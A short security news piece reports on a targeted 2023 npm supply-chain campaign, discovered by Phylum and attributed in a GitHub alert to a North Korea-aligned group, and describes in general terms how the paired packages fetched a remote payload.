June's Sophisticated npm Attack Attributed to North Korea
#Threat Defense#Threat Management
Repository with projects for photo and video hashing, content moderation, and signal exchange.
In June 2023, Phylum made a significant discovery
In June 2023, Phylum was the first to uncover a series of suspicious npm publications that seemed to be part of a highly targeted attack.
The Identified Packages and Their Installation Sequence
The identified packages, which were published in pairs, needed to be installed in a specific order. This sequence allowed for the retrieval of a token that enabled the download of a final malicious payload from a remote server. A recent security alert from GitHub has publicly linked this cyber-attack—an incident they were investigating independently—to threat actors with strong connections to North Korean objectives.
The GitHub Security Alert: Insights from July 2023
On July 18, 2023, GitHub published a security alert on their blog. This alert provided additional insights into a recent attack, which they had been investigating in collaboration with npm, their subsidiary.
They described it as a low-volume social engineering campaign
They characterized it as a "low-volume social engineering campaign that targets the personal accounts of employees of technology firms." Furthermore, they stated the following: We assess with high confidence that this campaign is linked to a group that operates in support of North Korean objectives, referred to as Jade Sleet by Microsoft Threat Intelligence and TraderTraitor by the U.S.
